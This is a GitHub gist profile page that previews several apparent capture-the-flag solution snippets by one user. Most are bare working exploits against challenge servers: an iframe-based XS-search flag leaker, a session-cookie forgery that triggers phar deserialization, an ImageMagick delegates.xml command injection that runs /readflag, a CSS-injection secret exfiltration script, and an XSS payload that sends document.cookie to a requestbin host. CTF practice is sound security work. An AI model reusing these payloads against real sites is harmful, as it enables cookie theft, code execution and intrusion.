Skip to content

Instantly share code, notes, and snippets.

View tyage's full-sized avatar

tyage tyage

108 followers · 28 following
View GitHub Profile
@tyage
tyage / bruteforce.py
Last active April 1, 2020 03:31
#!/usr/bin/env python3
import random
import sys
FLAG_LENGTH = 42
OPS_CURSOR = 0
RESULT_CURSOR = 0
TIME = 157763354
@tyage
tyage / openctf.md
Created August 10, 2019 17:46
@tyage
tyage / secret-note-keeper.php
Created June 1, 2019 13:49
<?php
$prefix = "";
if ($_GET["prefix"]) { $prefix = $_GET["prefix"]; }
for ($i = 20; $i <= 126; $i++) {
echo "<iframe id='" . chr($i) . "' src='http://challenges.fbctf.com:8082/search?query=fb%7b" . urlencode($prefix . chr($i)) ."'></iframe>";
}
?>
<script>
Array.from(document.querySelectorAll('iframe')).forEach(f => {
@tyage
tyage / avater-uploader-2
Created May 18, 2019 23:22
IMAGE=$(curl http://153.127.202.154:1002/upload.php -F "[email protected]" -vvv 2>&1 | grep Set-Cookie | sed -r 's/^.*session=([^.]+).*$/\1/' | base64 -d 2>/dev/null | sed -r 's/^.*avatar":"([^"]+).*$/\1/')
echo $IMAGE
wget http://153.127.202.154:1002/uploads/$IMAGE
node -e "function btoa(str) { var buffer; if (Buffer.isBuffer(str)) { buffer = str; } else { buffer = new Buffer(str.toString(), 'binary'); } return buffer.toString('base64');};console.log('session=' + btoa('{\"name\":\"AAAAAAAAAAAAAAAA\",\"flash\":{\"type\":\"error\",\"message\":\"Uploaded file is not PNG format.\"},\"theme\":\"phar://./uploads/$IMAGE/exploit\"}').replace(/=/g,'') + '.JDJ5JDEwJC5LS1h0UnlUbC5OeHhWVHdFRXovZ095N2taU3NPTXBhTDRnMi4yNXkwMnQ3eHp1dW16SzVt')" > cookie
COOKIE=$(cat cookie)
echo $COOKIE
@tyage
tyage / wallbreaker.php
Last active April 1, 2020 03:33
<?php
$home = '/tmp/84d99af2ce44bb1dd3398190b930c8ac';
ini_set('display_errors', 1);
mkdir("$home/.magick/");
file_put_contents("$home/.magick/delegates.xml", "<delegatemap><delegate decode=\"foo\" command=\"/readflag > $home/flag\"/></delegatemap>");
mkdir("$home/.config/");
mkdir("$home/.config/ImageMagick");
file_put_contents("$home/.config/ImageMagick/delegates.xml", "<delegatemap><delegate decode=\"foo\" command=\"/readflag > $home/flag\"/></delegatemap>");
touch("$home/test.foo");
$_ENV['HOME'] = $home;
@tyage
tyage / raddit.php
Last active April 1, 2020 03:33
<?php
$encrypted_block = 'PKklQOstCkI=';
$message = '';
$charset = '_-abcdefghijklmnopqrstuvwxyz0123456789';
$str_length = strlen($charset);
$method = 'DES-ECB';
function check($flag) {
@tyage
tyage / docker-compose.yml
Created August 25, 2018 14:00
version: '3'
services:
dockerauth:
image: cesanta/docker_auth
ports:
- "5001:5001"
volumes:
- ./config:/config:ro
- ./log:/logs
@tyage
tyage / catchat.js
Created June 23, 2018 12:11
prefix = 'L0LC47S_43V3R'
grecaptcha.execute(recaptcha_id, {action: 'report'}).then((token) => send('/report ' + token));
setTimeout(() => {
fetch(`send?name=${encodeURIComponent('/secret wao; Domain=a.cat-chat.web.ctfcompetition.com')}&msg=dog`)
}, 2000);
setTimeout(() => {
let payload = ''
for(let i = '0'.charCodeAt(0); i <= '9'.charCodeAt(0); ++i) {
let a = String.fromCharCode(i)
payload += `span[data-secret^=${prefix}${a}]{background:url(./send?name=a&msg=flag%20${a})}`
@tyage
tyage / h4x0rs.date
Created May 29, 2018 03:23
<script>location.href="//requestbin.fullcontact.com/15g8ko51?"+document.cookie</script>
<iframe src=/profile.php?id=c7ab51c5bdeec6bc6068d8a643a29907a1b7c71acb455454381fe7320cd5283e id=msg csp="script-src 'unsafe-inline';">
@tyage
tyage / VBox.log
Last active May 26, 2018 05:45
VirtualBox VM 5.2.10_Ubuntu r121806 linux.amd64 (Apr 26 2018 08:49:04) release log
00:00:00.267421 Log opened 2018-05-26T05:35:20.048575000Z
00:00:00.267422 Build Type: release
00:00:00.267424 OS Product: Linux
00:00:00.267425 OS Release: 4.15.0-22-generic
00:00:00.267425 OS Version: #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018
00:00:00.267439 DMI Product Name: System Product Name
00:00:00.267443 DMI Product Version: System Version
00:00:00.267471 Host RAM: 32165MB (31.4GB) total, 30320MB (29.6GB) available
00:00:00.267473 Executable: /usr/lib/virtualbox/VirtualBox